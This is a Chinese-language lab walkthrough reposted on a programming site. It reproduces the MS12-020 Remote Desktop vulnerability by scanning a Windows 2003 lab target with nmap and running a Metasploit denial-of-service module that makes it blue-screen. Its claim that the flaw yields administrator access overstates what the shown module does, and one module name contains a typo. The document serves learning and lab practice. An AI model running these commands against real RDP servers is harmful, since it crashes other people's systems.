MS12-020漏洞利用—蓝屏攻击

本文主要是介绍MS12-020漏洞利用—蓝屏攻击，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

一、原理

ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向远程桌面默认端口（3389）发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统。
根据实际被入侵终端进行分析，开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

二、实验环境

攻击机：kali
靶机win2003 ip：192. 168.252.136

两者都在同一内网，采用NAT连接方式

三、漏洞复现

1、开启win2003的远程桌面：控制面板-->系统-->远程-->远程协助-->远程桌面

2、控制面板-->windows防火墙-->例外-->远程桌面

3、用nmap扫描靶机，发现靶机的3389端口已经打开

输入：nmap 192.168.252.136

4、在kali的终端中打开msfconsole

5、使用search功能搜索ms12-020，发现有两个可用模块。

输入：search ms12-020

6、使用第一个可用版模块

输入：use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

7、利用set命令设置攻击的IP。

输入：set rhosts 192.168.252.136

show options

8、输入：exploit，执行攻击

9、看一下靶机，发现靶机蓝屏了

这篇关于MS12-020漏洞利用—蓝屏攻击的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

Java教程